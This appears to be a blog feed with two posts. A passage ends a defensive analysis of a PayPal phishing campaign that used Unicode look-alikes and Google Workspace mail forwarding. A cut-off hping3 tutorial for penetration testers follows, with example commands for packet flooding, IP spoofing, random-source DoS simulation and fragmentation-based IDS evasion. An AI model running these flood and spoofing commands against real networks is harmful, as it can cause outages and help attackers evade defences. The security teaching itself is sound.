9 became 𝟵
Words:
In “PayPal Support,” only the first letters were replaced:
P became 𝐏
S became 𝗦
Phone number:
Every digit in the phone number was replaced with the same stylized Unicode digits:
8 -> 𝟴
0 -> 𝟬
5 -> 𝟱
6 -> 𝟲
3 -> 𝟯
7 -> 𝟳
Spaces:
In the phrase “cancel⠀and⠀Refund”, the normal spaces are replaced with Unicode Braille blank, which looks identical to a space:
space → ⠀ (U+2800 “Braille Pattern Blank”)
The Forwarding Trick
This phishing campaign used a clever technique that forwarded the scam email to the victim while being sent from a verified PayPal.com domain.
The attacker first sent the phishing message to an address at a domain they controlled. That domain was configured to automatically forward all incoming email to the victim. I checked the domain’s MX (Mail Exchanger) record using dig:
dig mx aldiscover.feedback
The response shows:
aldiscover.feedback. 1799 IN MX 1 smtp.google.com.
This response shows that Google handles the email for the domain. We can identify it as a Google Workspace email because it uses a custom domain while routing through Google’s servers.
According to Google Workspace documentation, emails sent to a domain can be forwarded without verifying ownership.
The original sender is preserved in the email header using the “Add X-Gm-Original-To” setting, which keeps the original recipient information in the message header and makes the forwarded email appear as if it was sent directly from the original sender.
The documentation states:
"Messages you redirect or forward appear to come directly from the original sender. The To: address in redirected messages includes the original recipient address only. Add X-Gm-Original-To header: Check this box to keep the original recipient information in the message header. You might want to do this if you manage any email based on message headers. Message header information can also be useful for troubleshooting email delivery."
The attacker likely uploaded a list of emails using the bulk import feature, which allows one forwarding address to map to up to 5,000 recipients at a time.
This is also likely why the forwarding address includes a number (for example, receipt10@aldiscover.feedback), since the attacker could create multiple forwarding inboxes and assign 5,000 target addresses to each.
As the documentation explains:
"You can more easily map a large number of address by entering them as comma-delimited entries, such as from spreadsheet. The maximum number of recipient addresses for all address maps is 5,000. For example, you can add 1 address map with 5,000 recipient addresses, 50 address maps with 100 recipients each, or 1,000 address maps with 5 recipients each."
The attacker may have created many such forwarding addresses, such as:
receipt1@aldiscover.feedback receipt2@aldiscover.feedback receipt3@aldiscover.feedback etc…
Domain Analysis:
With modern web infrastructure, obtaining meaningful information from domain analysis can be challenging. Many registrars provide free privacy protection by default, which makes it difficult to identify the domain’s registrant.
Despite this limitation, it is still valuable to review basic domain registration information. WHOIS records provide publicly available details about a domain. These can include:
The registrar
Registration and expiration dates
Name servers
Sometimes the owner’s contact information
WHOIS records can be checked using the command:
whois aldiscover.feedback
The results show:
Registrar: NameCheap. A common registrar, used by both legitimate and malicious actors.
Registration Date: 2025-11-24. Extremely new; new domains are often used in phishing or scam campaigns.
Expiry Date: 2026-11-24. Only a 1-year registration, typical of temporary/malicious domains.
Owner Information: Redacted. Privacy protection is enabled, hiding registrant details.
DNS: Default NameCheap servers.
Checking for a website:
To see if the domain is used solely for email, I checked its DNS A record, which would indicate a web server if one existed. Using the command:
dig A aldiscover.feedback
The results show:
; <<>> DiG 9.20.15-2-Debian <<>> A aldiscover.feedback ;; global options: +cmd ;; Got answer: ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 10430 ;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1 ;; AUTHORITY SECTION: aldiscover.feedback. 3600 IN SOA dns1.registrar-servers.com. hostmaster.registrar-servers.com. 1764166261 43200 3600 604800 3601
The output shows that there is no A record, meaning the domain does not resolve to any IP address and therefore does not point to a web server.
The only record returned is an SOA (Start of Authority) record, which identifies the primary nameserver for the domain. This indicates that the domain exists solely for email purposes, consistent with a phishing-only setup.
Recommendations
This attack exploited two critical vulnerabilities: (1) Google Workspace allows email forwarding to arbitrary addresses without recipient consent, and (2) PayPal merchant forms accept invalid/misleading data in URL and contact fields.
The remediation for this issue falls into the hands of both users and the companies that host this infrastructure.
Recommendations for Users:
To protect themselves from phishing scams, users should follow these precautions:
Be cautious of urgent or alarming messages: Avoid clicking links or calling numbers in emails that try to provoke panic.
Verify the sender and email address: Check headers or sender details to confirm the email is legitimate. Do not trust headers alone, as this case demonstrates, even valid domains can be a threat.
Use official channels: Contact companies directly through verified websites or apps rather than responding to email instructions. If you type the company’s address in your browser, be careful to type it accurately. If you use a search engine like Google to find their website, avoid clicking on “sponsored” results, as these can often lead to scams.
Report phishing attempts: Use the “Report Phishing” feature in your email provider to help block future scams. (See instructions: Gmail, Outlook)
Stay informed: Learn about common phishing tactics, including Unicode obfuscation, unusual forwarding, and look‑alike domains.
Users should be wary of all communications in their email inbox, especially those designed to illicit a panicked response. If you do receive an email that concerns you, do not click any links.
Recommendations for PayPal:
To help prevent scams like this phishing campaign, PayPal should:
Block non-standard characters in form inputs: Prevent look‑alike Unicode letters, digits, or invisible characters that can bypass filters.
Tighten word restrictions: Restrict which words can appear in merchant forms to prevent scammers from inserting misleading text like “PayPal” or “Support.”
Enforce strict field validation: Ensure every form field only accepts the type of data it is intended for, so URLs only accept valid URLs, email fields only accept properly formatted emails, numeric fields only accept numbers, and so on.
Limit lengths and formats for all fields: Apply reasonable maximum lengths and allowable characters to names, usernames, and other text fields to prevent abuse.
Monitor for suspicious entries: Flag forms with unusual formatting, non-standard characters, or suspicious combinations of data for review before activation.
Recommendation for Google:
To reduce the risk of email forwarding abuse in phishing attacks, Google should:
Verify ownership of forwarding addresses: Require confirmation that the recipient controls the destination address before allowing email forwarding.
Limit bulk forwarding capabilities: Impose stricter limits on the number of addresses a single forwarding rule can target.
Detect non-standard Unicode characters: Flag or block forwarding rules that use look‑alike letters, digits, or symbols to bypass filters.
Identify invisible or special-space characters: Prevent forwarding rules that include Braille blanks or other invisible characters.
Enhance monitoring and alerts: Trigger alerts for unusual forwarding patterns, such as multiple recipients across many different domains or emails coming from newly registered or suspicious domains, which are often indicators of phishing campaigns.
Phishing attacks hit a new record in 2025, with nearly 2 million unique phishing sites detected in a single year (the highest ever recorded) and overall cybercrime surging 60% year over year. The threat is still growing fast.
Stay safe out there!

Hping3 for Ethical Hackers: Crafting Packets, Probing, Denial of Service & Firewall Evasion

Dark Marc — Tue, 18 Nov 2025 17:40:43 GMT

Hping3 is a packet crafting tool that gives you direct control over individual network packets for security testing and advanced network analysis.
Key capabilities for ethical hackers include:
Craft Custom Packets: Build TCP, UDP, ICMP, and raw IP packets with full control over headers, flags, timing, and payload.
Probe Hosts and Ports: Manually discover hosts and scan ports when automated tools are blocked or too noisy.
Test Firewalls and IDS/IPS: Send specific or unusual traffic to check how security devices respond.
Traffic and DoS Simulation: Generate high-rate or abnormal traffic to test DDoS defenses and system resilience.
Simulating a Distributed Denial of Service Attack (DDOS) with Hping3
Hping3 in Your Workflow:
Hping3 fits into penetration tests after you finish broad discovery with a network‑mapping tool like Nmap.
Once Nmap identifies hosts, ports, and services, Hping3 can probe those targets with custom traffic and test edge cases that scanners can’t handle.
Common uses include:
A firewall is blocking automated scans because it detects Nmap’s signatures, so raw, custom packets are more likely to pass.
Specific hosts or services have been identified, and you need precise, controlled packets to test how they respond under certain conditions.
You need to verify firewall rules, analyze packet handling, or send traffic patterns that automated tools can’t generate.
Hping3 complements network scanning tools by providing manual, packet-level control for precise and targeted testing. It does not perform automated scanning, but rather sends the packets you craft while reporting the responses.
Think of it like a scalpel for network testing: precise, controlled, and fully in your hands: letting you probe, manipulate, and analyze traffic in targeted ways that automated scanning tools can’t.
The History of Hping3
Hping was created by Salvatore Sanfilippo (”Antirez”) in the late 1990s.
The original utility focused on TCP packet crafting for tasks like firewall testing and network probing. Sanfilippo developed Hping3 starting in 2004 as a major evolution. The redesign was driven by the need to:
Expand Protocol Support: Incorporate functionality for protocols beyond TCP, including ICMP, UDP, and RAW-IP modes.
Enable Scripting: Add capabilities for automated, scripted network testing, significantly increasing the tool’s versatility for security auditing.
Early versions were used for experimenting with advanced features like network scanning and system fingerprinting.
The stable version of Hping3 was officially released on November 5, 2005, and published under the GPLv2 license. Salvatore Sanfilippo is also the creator of the popular open-source project, Redis.
⚠︎ Disclaimer: Legal Use Only
Using Hping3 without proper authorization may be illegal and violate computer crime laws in your jurisdiction. Sending packets can disrupt services, cause outages, exhaust system resources, or result in data loss.
Always obtain written permission and clearly understand the scope, authorized targets, and permitted methods before testing any network or system.
The writer of this guide assumes no liability for any misuse, illegal activity, or damage resulting from the information provided.
Pre-Requisites
This guide assumes you’re already familiar with networking fundamentals and penetration testing basics. If you’re reading this, you should already know:
What You Need to Know
Networking basics: IP addressing, CIDR notation, TCP vs UDP, common ports, and how firewalls work.
Basic packet knowledge: Understanding packet structure and headers.
Command line: You can navigate terminals and run commands with sudo/admin privileges on your OS of choice.
How to Install Hping3:
Hping3 is primarily designed for Linux and is included in most Linux distributions like Kali, Debian, and Ubuntu.
Linux: Fully supported, can be installed via package managers (apt install hping3) or compiled from source.
Windows: Older versions of hping (like hping2) exist, but support is limited and development is mostly inactive. Hping3 does not have an official, fully functional Windows version.
macOS: Can be installed via Homebrew (brew install hping) but may require additional permissions or compilation tweaks.
Linux (Recommended)
Hping3 is fully supported on Linux and comes pre‑installed on distros like Kali and Parrot. You can update or install it with:
sudo apt update && sudo apt install hping3
Windows
Hping3 does not have a native, fully supported Windows version.
The recommended way to use it on Windows is through WSL (Windows Subsystem for Linux), which gives you full Linux functionality.
macOS
Hping3 can be installed on macOS using Homebrew:
brew install hping
Virtual Machines
You can also set up a virtual machine using a hypervisor such as VirtualBox, UTM, or Parallels (for Mac) and run a Linux distribution inside it.
This can be a preferable option if you don’t have access to a native Linux machine, providing full Linux functionality for using hping3.
Basic Command Structure
Hping3 uses a flexible, modular command format that lets you build simple or highly customized packets depending on your testing needs.
Command Syntax
The basic syntax defines how every hping3 command is structured. Hping3 commands are made up of three parts:
Mode: Specifies the protocol or operational mode hping3 should use.
Options: Modify packet behavior, headers, timing, and output.
Target: Defines the host or IP address you’re sending packets to.
hping3 [mode] [options] target
Learning Tip: Hping3 + Wireshark
When you’re learning Hping3, it can be helpful to run commands on Nmap and watch how they translate to network traffic in Wireshark.
This lets you see exactly what packets Hping3 sends and how targets respond, making it easier to understand what each scan type and option actually does at the network level. Use Wireshark filters to view specific traffic:
# Wireshark Filter Cheat Sheet # Show packets coming from a specific IP ip.src == # Show packets going to a specific IP ip.dst == # Show all packets to or from a specific IP ip.addr == # Combine filters with && for more specific traffic ip.src == && ip.dst == # Filter by protocol tcp udp icmp arp # Filter by port number tcp.port == 80 udp.port == 53 # Combine protocol and IP filters tcp && ip.addr ==
Mode
Modes define what kind of packets hping3 sends and the overall behavior of the tool. Choose a mode based on the protocol or action you want to test.
These modes determine the network protocol or special operation hping3 will use when sending packets.
Default (TCP): Sends TCP packets for basic probing or flag‑based testing.
-0 / --rawip: Lets you craft arbitrary IP packets when you need full control over protocol values.
-1 / --icmp: Sends ICMP packets for ping-like tests or diagnostic probing.
-2 / --udp: Sends UDP packets to test UDP services, firewalls, and filtering.
-8 / --scan: Performs manual port scanning when Nmap is blocked or filtered.
-9 / --listen: Listens for packets, useful for debugging or custom replies.
-T / --traceroute: Maps the hop path to a target using TTL increments.
Default (TCP)
Sends standard TCP packets and is used automatically if no mode flag is given. It allows testing connectivity, flags, and basic TCP behavior. Useful for quick SYN, ACK, or custom flag‑based probing.
hping3 -S -p 80
-0 / --rawip
Crafts raw IP packets, giving full control over protocol fields. This mode is useful when you need to send packets belonging to uncommon or custom protocol numbers. It is mainly used for advanced testing where standard TCP/UDP/ICMP does not apply.
hping3 -0 --ipproto 253
-1 / --icmp
Sends ICMP packets similar to traditional ping. Useful for reachability checks, diagnostics, and network path behavior. Often used when ICMP must be tested specifically instead of TCP or UDP.
hping3 -1
-2 / --udp
Sends UDP packets to test UDP services or filtering behavior. Helpful for checking whether hosts respond with ICMP “port unreachable.” Useful for understanding how firewalls handle UDP traffic.
hping3 -2 -p 12345
-8 / --scan
Performs a manual TCP port scan on a target or range of targets.
This mode is useful when scanners such as Nmap are blocked or filtered.
The option expects a port group argument. Port groups use the following rules:
A single number scans one port
A range uses start-end format
all scans ports 0 through 65535
known scans all ports listed in /etc/services.
/etc/services is a system file found on Unix and Linux systems. It acts as a directory of well-known network services and the ports they use.
Groups may be combined
Groups may be negated using !
The port group must appear immediately after the -8 flag
The port group must immediately follow the -8 flag. Most other hping3 options still work inside scan mode.
For example, you must specify -S to perform a SYN scan, and you can still modify TCP window size, TTL, IP fragmentation, and more. The only difference is that normal hping3 behavior is wrapped inside a scanning algorithm.
# Scan port 22 only (single port) hping3 -8 22 # Scan ports 1 through 1000 (range) hping3 -8 1-1000 # Scan all ports 0 through 65535 (all) hping3 -8 all # Scan all ports defined in /etc/services (known) hping3 -8 known # Scan ports 1 through 1000 plus port 8888 plus all known ports hping3 --scan 1-1000,8888,known -S target.host.com # Scan all ports from 1 through 1024 except those listed in /etc/services hping3 --scan ‘1-1024,!known’ -S target.host.com
-9 / --listen
Listens for packets that contain a specific signature string. Useful for debugging, custom signaling, or simple packet-trigger experiments. The tool waits passively until matching traffic arrives.
hping3 -9 MYTAG
-T / --traceroute
Performs traceroute using TCP packets instead of ICMP. It increments TTL values to map network hops to the destination. Useful for bypassing filters that block regular traceroute probes.
hping3 -T -p 80
Options
Options modify packet headers, timing, or output for the selected mode and target. Some options work universally, others only in specific modes. Some options have both short and long forms.
In the following ”Core Functions for Ethical Hackers” section, we’ll go over how to combine these options for specific use cases.
Help & Version
# Command: -h or --help Displays the complete usage guide with all available options and syntax for quick reference during testing without opening the manual page. # Example(s) hping3 -h hping3 --help # Command: -v or --version Shows the current hping3 version number and data link layer type (Ethernet, PPP, etc.) for verifying compatibility and documenting tool versions in reports. # Example(s) hping3 -v hping3 --version
Packet Sending Rate & Control
# Command: -c [count] or --count [count] Sends exactly the specified number of packets then stops and displays summary statistics. Use for controlled scanning with precise packet counts, benchmarking firewall rules, measuring response rates, or limiting traffic to avoid detection. # Example(s) hping3 -c 10 192.168.1.1 hping3 --count 10 192.168.1.1 # Command: -i [interval] or --interval [interval] Sets the time delay between consecutive packets. Accepts X for seconds, uX for microseconds (u500 = 500µs), or mX for milliseconds. Spaces out packets to evade rate-based intrusion detection systems and simulate realistic traffic patterns during reconnaissance. # Example(s) hping3 -i u500 192.168.1.1 hping3 -i 2 192.168.1.1 hping3 --interval u1000 192.168.1.1 # Command: --fast Sends exactly 10 packets per second (100ms intervals). Provides moderate speed for SYN scans without triggering rate limiting or flood detection mechanisms. # Example(s) hping3 --fast 192.168.1.1 # Command: --faster Increases speed to approximately 100 packets per second (~1ms intervals). Use for time-sensitive operations like latency measurements or rapid service enumeration where speed matters but full flooding would be counterproductive. # Example(s) hping3 --faster 192.168.1.1 # Command: --flood Transmits packets at maximum speed without waiting for replies or adding delays. Sends as fast as the network interface and system can process. Use for stress testing network devices, measuring maximum throughput, or authorized denial-of-service simulations in controlled environments. # Example(s) hping3 --flood 192.168.1.1
Interface & Output Control
# Command: -I [interface name] or --interface [interface name] Forces packet transmission through a specific network interface (eth0, wlan0, tun0). Critical for multi-homed systems to direct traffic through a particular path like VPN tunnels, specific network segments during internal assessments, or isolating test traffic from production. # Example(s) hping3 -I eth0 192.168.1.1 hping3 --interface wlan0 192.168.1.1 # Command: -n or --numeric Disables reverse DNS lookups and displays all IP addresses numerically. Speeds up large network scans by eliminating DNS resolution overhead, prevents information leakage through DNS queries, and avoids timeout delays when scanning hosts without reverse DNS entries. # Example(s) hping3 -n 192.168.1.1 hping3 --numeric 192.168.1.1 # Command: -q or --quiet Suppresses per-packet output and displays only initial parameters and final summary statistics. Keeps log files clean in automated scripts, reduces console clutter during long-running tests, and focuses on aggregate results. # Example(s) hping3 -q 192.168.1.1 hping3 --quiet 192.168.1.1 # Command: -V or --verbose Shows comprehensive packet-level information including headers, flags, and timing for every packet sent and received. Use for deep packet inspection, analyzing protocol behavior, debugging unexpected responses, and developing packet-level exploits or evasion techniques. # Example(s) hping3 -V 192.168.1.1 hping3 --verbose 192.168.1.1 # Command: -D or --debug Activates debug mode showing internal program state, function calls, and detailed error messages. Use for troubleshooting unexpected behavior, diagnosing custom packet configuration issues, or understanding why raw packet scenarios fail at the OS level. # Example(s) hping3 -D 192.168.1.1 hping3 --debug 192.168.1.1 # Command: -z or --bind Binds CTRL+Z to dynamically adjust TTL values during execution. Allows interactive hop-by-hop traceroute adjustments in real-time without restarting the command or losing session state. # Example(s) hping3 -z 192.168.1.1 hping3 --bind 192.168.1.1 # Command: -Z or --unbind Releases CTRL+Z binding and restores standard Unix signal behavior where CTRL+Z suspends the process. Use after interactive TTL sessions to return to normal terminal control. # Example(s) hping3 -Z 192.168.1.1 hping3 --unbind 192.168.1.1 # Command: --beep Produces an audible beep for each received reply packet. Helpful for passive monitoring when you need audio alerts for arriving responses, particularly during long-running scans or when multitasking. # Example(s) hping3 --beep 192.168.1.1
Source & Destination Address Control
# Command: -a [hostname] or --spoof [hostname] Forges the source IP address in outgoing packets to appear as if they originated from the specified host. Use for testing anti-spoofing mechanisms, assessing ingress filtering effectiveness, conducting backscatter analysis by triggering responses to spoofed addresses, or testing firewall rules that trust certain source IPs. # Example(s) hping3 -a 10.0.0.5 192.168.1.1 hping3 --spoof 10.0.0.5 192.168.1.1 # Command: --rand-source Generates a random source IP address for each packet, creating the appearance of distributed traffic from multiple origins. Use for simulating distributed denial-of-service scenarios in authorized tests, evading source-based blocking rules or rate limits, and making traffic correlation difficult for security devices. # Example(s) hping3 --rand-source 192.168.1.1 # Command: --rand-dest Randomizes destination IP addresses according to specified rules, distributing packets across multiple targets. Use for broad network mapping without sequential predictability, fuzzing multiple endpoints simultaneously, or simulating scattered attack patterns to test network-wide detection. # Example(s) hping3 --rand-dest 192.168.1.x
IP Header Options
# Command: -t [ttl] or --ttl [ttl] Sets the IP Time To Live field (0-255), determining maximum router hops before packet discard. Each router decreases TTL by 1; packet drops when reaching 0. Use for traceroute operations, path MTU discovery, fingerprinting intermediate devices based on TTL behavior, and crafting packets that expire at specific network boundaries. # Example(s) hping3 -t 5 192.168.1.1 hping3 --ttl 64 192.168.1.1 # Command: -N [id] or --id [id] Manually overrides the IP identification field with a specific value instead of automatic OS assignment. The IP ID identifies fragments of the same packet. Use for replay attacks with predictable ID values, evading security devices that correlate packets by ID sequence patterns, or testing whether IDS systems track IP fragmentation through ID matching. # Example(s) hping3 -N 12345 192.168.1.1 hping3 --id 12345 192.168.1.1 # Command: -H [protocol] or --ipproto [protocol] Sets the IP protocol number in the IP header for RAW IP mode. Standard protocols use 6 for TCP, 17 for UDP, 1 for ICMP. Use for crafting packets with non-standard or uncommon protocols to test protocol-aware filters, assess firewall protocol handling, or probe for vulnerabilities in custom protocol parsers. # Example(s) hping3 -H 47 192.168.1.1 hping3 --ipproto 6 192.168.1.1 # Command: -W or --winid Uses Windows-style byte ordering for the IP ID field (little-endian) instead of standard network byte order (big-endian). Aids OS fingerprinting evasion by making Linux-generated packets appear as Windows traffic, helping blend into predominantly Windows network environments. # Example(s) hping3 -W 192.168.1.1 hping3 --winid 192.168.1.1 # Command: -r or --rel Displays IP ID field values as relative increments from the previous packet instead of absolute values. Use for detecting Network Address Translation (NAT) devices, identifying load balancers through ID sequence discontinuities, or fingerprinting how different systems increment IP ID counters during reconnaissance. # Example(s) hping3 -r 192.168.1.1 hping3 --rel 192.168.1.1 # Command: -o [hex_tos] or --tos [hex_tos] Sets the IP Type of Service (ToS) or Differentiated Services (DiffServ) field using hexadecimal values. Use for testing Quality of Service policy enforcement, validating priority-based routing behavior, or verifying whether traffic classification and marking rules are correctly applied. # Example(s) hping3 -o 0x10 192.168.1.1 hping3 --tos 0x10 192.168.1.1 # Command: -G or --rroute Enables the IP record route option, instructing routers to insert their IP addresses into the packet header. Captures and displays the actual route taken, revealing internal network topology in environments where routers honor this option (increasingly rare due to security concerns and performance overhead). # Example(s) hping3 -G 192.168.1.1 hping3 --rroute 192.168.1.1
Fragmentation Options
# Command: -f or --frag Forces packet fragmentation, splitting data across multiple IP fragments. Use for testing fragmentation handling in firewalls or IDS, probing for fragment reassembly vulnerabilities, or evading signature-based detection that only inspects individual fragments without reassembling streams. # Example(s) hping3 -f 192.168.1.1 hping3 --frag 192.168.1.1 # Command: -x or --morefrag Sets the “more fragments” (MF) flag in the IP header, indicating additional fragments follow. Use for testing how security devices handle incomplete fragment streams, probing drop policies for fragments that never complete, or crafting malformed fragmentation sequences to test parser robustness. # Example(s) hping3 -x 192.168.1.1 hping3 --morefrag 192.168.1.1 # Command: -y or --dontfrag Sets the “don’t fragment” (DF) bit in the IP header, instructing routers never to fragment the packet. If the packet exceeds link MTU, routers drop it and send back an ICMP message. Use for Path MTU Discovery (PMTUD) to find maximum packet size, identifying MTU black holes where oversized packets are silently dropped, or forcing specific packet sizes for exploit delivery. # Example(s) hping3 -y 192.168.1.1 hping3 --dontfrag 192.168.1.1 # Command: -g [offset] or --fragoff [offset] Manually sets the fragment offset field, indicating where in the original packet this fragment belongs (measured in 8-byte blocks). Use for crafting overlapping fragments, out-of-order fragments, or malformed fragmentation patterns to bypass weak reassembly logic or test fragment handling edge cases. # Example(s) hping3 -g 100 192.168.1.1 hping3 --fragoff 100 192.168.1.1 # Command: -m [mtu] or --mtu [mtu] Enforces a virtual Maximum Transmission Unit controlling fragment sizing. Makes hping3 fragment packets as if sent over a link with the specified MTU. Use for simulating small-MTU links for evasion testing or validating how applications and security devices handle various fragment sizes. # Example(s) hping3 -m 500 192.168.1.1 hping3 --mtu 1280 192.168.1.1
ICMP-Specific Options
# Command: -C [type] or --icmptype [type] Selects ICMP message type (0-255). Type 8 is echo request (standard ping), type 0 is echo reply, type 3 is destination unreachable, type 11 is time exceeded (traceroute). Use for custom ping sweeps, crafting specific ICMP messages to test firewall rules, or probing target responses to various ICMP types during reconnaissance. # Example(s) hping3 -C 8 192.168.1.1 hping3 --icmptype 13 192.168.1.1 # Command: -K [code] or --icmpcode [code] Sets the ICMP code field providing additional detail for the selected type. Type 3 (destination unreachable) has code 0 for network unreachable, code 1 for host unreachable, code 3 for port unreachable. Use for precise ICMP message crafting to test granular firewall rules or simulate specific network error conditions. # Example(s) hping3 -C 3 -K 3 192.168.1.1 hping3 --icmptype 3 --icmpcode 1 192.168.1.1 # Command: --icmp-ipver [version] Sets the IP version in the ICMP-embedded IP header. Use for manipulating the IP header embedded inside ICMP error messages to test how devices parse embedded headers or simulate error messages for protocols that don’t match the outer packet. # Example(s) hping3 --icmp-ipver 4 192.168.1.1 # Command: --icmp-iphlen [length] Sets the IP header length in the ICMP-embedded header. Use for manipulating the IP header embedded inside ICMP error messages to test parser handling or conduct ICMP tunneling experiments. # Example(s) hping3 --icmp-iphlen 20 192.168.1.1 # Command: --icmp-iplen [length] Sets the total IP packet length in the ICMP-embedded header. Use for manipulating the IP header embedded inside ICMP error messages to test how devices handle malformed embedded headers. # Example(s) hping3 --icmp-iplen 100 192.168.1.1 # Command: --icmp-ipid [id] Sets the IP ID in the ICMP-embedded IP header. Use for manipulating the IP header embedded inside ICMP error messages or conducting ICMP tunneling experiments. # Example(s) hping3 --icmp-ipid 5000 192.168.1.1 # Command: --icmp-ipproto [protocol] Sets the protocol field in the ICMP-embedded IP header. Use for simulating error messages for specific protocols or testing how devices parse embedded protocol fields. # Example(s) hping3 --icmp-ipproto 6 192.168.1.1 # Command: --icmp-cksum [checksum] Forces a specific ICMP checksum value, including intentionally incorrect checksums. Use for testing whether targets validate ICMP checksums before processing, probing for vulnerabilities where hardware checksum offload bypasses validation, or identifying devices that accept malformed ICMP packets. # Example(s) hping3 --icmp-cksum 0xFFFF 192.168.1.1 # Command: --icmp-ts Sends an ICMP timestamp request (type 13), asking the target to reply with its current system time. Use for gathering remote clock information to calculate clock skew for OS fingerprinting, detecting virtualized environments through timing anomalies, or exploiting timing side-channels in cryptographic implementations. # Example(s) hping3 --icmp-ts 192.168.1.1 # Command: --icmp-addr Sends an ICMP address mask request (type 17), historically used to query a host’s subnet mask. Modern systems rarely respond. Use for mapping legacy network configurations, identifying old systems that honor deprecated ICMP types, or discovering older infrastructure during reconnaissance. # Example(s) hping3 --icmp-addr 192.168.1.1
TCP/UDP Port Options
# Command: -s [port] or --baseport [port] Sets or fixes the source port number for outgoing packets. Use for maintaining consistent source ports across packets to preserve stateful firewall sessions, spoofing trusted source ports (53 for DNS, 20 for FTP-DATA) to bypass poorly configured access controls, or setting a specific starting port for sequential scanning. # Example(s) hping3 -s 53 192.168.1.1 hping3 --baseport 8080 192.168.1.1 # Command: -p[+][+] [port] Sets destination port with optional auto-increment. -p 80 targets port 80 only, -p+ 80 increments per packet (80, 81, 82...), -p++ 80 increments per cycle. Use for automating sequential port scanning across ranges, testing versioned services on consecutive ports, or efficiently checking service availability across port spaces. # Example(s) hping3 -p 80 192.168.1.1 hping3 -p+ 80 192.168.1.1 hping3 -p++ 8000 192.168.1.1 # Command: --keep Locks the source port to a constant value instead of incrementing or changing. Use for stateful firewall testing where maintaining the same source address-port tuple is required for return traffic, or testing whether security devices properly track connection state based on consistent port pairs. # Example(s) hping3 --keep 192.168.1.1
TCP Header Options
# Command: -w [size] or --win [size] Sets the TCP window size field advertising receive buffer capacity. Use for probing window scaling implementation issues, triggering specific receiver behaviors based on window advertisements, testing how applications handle zero-window or unusually large/small window values, or fingerprinting TCP stack implementations. # Example(s) hping3 -w 65535 192.168.1.1 hping3 --win 0 192.168.1.1 # Command: -O [offset] or --tcpoff [offset] Sets the TCP data offset (header length), including values that don’t match actual header size. Use for crafting malformed TCP headers to test parser robustness, probing whether security devices validate header length fields, or attempting to bypass inspection by claiming headers extend beyond actual boundaries. # Example(s) hping3 -O 10 192.168.1.1 hping3 --tcpoff 15 192.168.1.1 # Command: -M [number] or --setseq [number] Sets the TCP sequence number to a specific value instead of random or automatic values. Use for TCP session hijacking simulations by predicting or replaying sequence numbers, conducting replay attacks using captured sequence values, or testing whether applications validate sequence number progression. # Example(s) hping3 -M 1000000 192.168.1.1 hping3 --setseq 500000 192.168.1.1 # Command: -L [number] or --setack [number] Sets the TCP acknowledgment number to a specific value. Use for simulating acknowledgment of unsent data, enabling session hijacking by crafting ACK packets that appear part of existing connections, or testing how applications handle out-of-sequence acknowledgments or malformed ACK values. # Example(s) hping3 -L 2000000 192.168.1.1 hping3 --setack 100000 192.168.1.1 # Command: -Q or --seqnum Displays TCP sequence numbers extracted from received reply packets. Use for mapping Initial Sequence Number (ISN) generation patterns for prediction attacks, analyzing sequence number randomness to assess TCP stack security, or tracking sequence progression to understand connection state during exploitation. # Example(s) hping3 -Q 192.168.1.1 hping3 --seqnum 192.168.1.1 # Command: -b or --badcksum Intentionally sends packets with incorrect TCP or UDP checksums. Use for verifying whether endpoints validate checksums or blindly trust them, detecting checksum offload configurations where network cards calculate checksums in hardware, or identifying middleboxes that modify packets without recalculating checksums. # Example(s) hping3 -b 192.168.1.1 hping3 --badcksum 192.168.1.1 # Command: --tcp-timestamp Enables TCP timestamp options and analyzes returned timestamps to estimate remote system uptime. Use for calculating how long a system has been running based on timestamp counter values, detecting virtualized or containerized hosts through timestamp behavior anomalies, or identifying load balancers by comparing timestamp values across connections. # Example(s) hping3 --tcp-timestamp 192.168.1.1
TCP Flag Options
# Command: -F or --fin Sets the FIN (finish) flag signaling connection termination. Use in FIN scans to enumerate ports by observing how closed ports respond with RST while open ports may ignore or respond differently, or for testing stateful firewall behavior. # Example(s) hping3 -F 192.168.1.1 hping3 --fin 192.168.1.1 # Command: -S or --syn Sets the SYN (synchronize) flag initiating TCP connection establishment. Use for SYN scanning to identify open ports through three-way handshake responses, or testing SYN flood protections by observing how systems handle connection requests. # Example(s) hping3 -S 192.168.1.1 hping3 --syn 192.168.1.1 # Command: -R or --rst Sets the RST (reset) flag abruptly terminating connections. Use for testing how applications handle unexpected connection resets, probing for state table manipulation opportunities, or generating reset packets to interfere with existing connections in authorized testing. # Example(s) hping3 -R 192.168.1.1 hping3 --rst 192.168.1.1 # Command: -P or --push Sets the PUSH flag requesting immediate data delivery to the application. Use for testing whether applications respond differently to pushed data, probing protocol timing behaviors, or ensuring data isn’t buffered during time-sensitive operations. # Example(s) hping3 -P 192.168.1.1 hping3 --push 192.168.1.1 # Command: -A or --ack Sets the ACK (acknowledgment) flag indicating data receipt. Use in ACK scans to map firewall rulesets based on how stateful firewalls handle unsolicited ACK packets, or testing whether systems track connection state properly. # Example(s) hping3 -A 192.168.1.1 hping3 --ack 192.168.1.1 # Command: -U or --urg Sets the URG (urgent) flag marking data as high-priority. Use for testing urgent pointer handling, probing for vulnerabilities in urgent data processing, or verifying whether applications properly implement TCP urgent mode. # Example(s) hping3 -U 192.168.1.1 hping3 --urg 192.168.1.1 # Command: -X or --xmas Sets FIN, URG, and PUSH flags simultaneously, creating an “Xmas tree” packet. Use for identifying non-RFC-compliant TCP stacks that respond to invalid flag combinations, fingerprinting operating systems based on how they handle malformed packets, or evading detection systems that don’t expect unusual flag patterns. # Example(s) hping3 -X 192.168.1.1 hping3 --xmas 192.168.1.1 # Command: -Y or --ymas Sets an invalid combination of SYN, FIN, and RST flags simultaneously. Use for stressing TCP state machines with contradictory instructions, testing parser robustness against malformed packets, probing for crash conditions or reset bugs in poorly implemented TCP stacks, or bypassing simple packet filters that only check individual flags. # Example(s) hping3 -Y 192.168.1.1 hping3 --ymas 192.168.1.1
Payload & Data Options
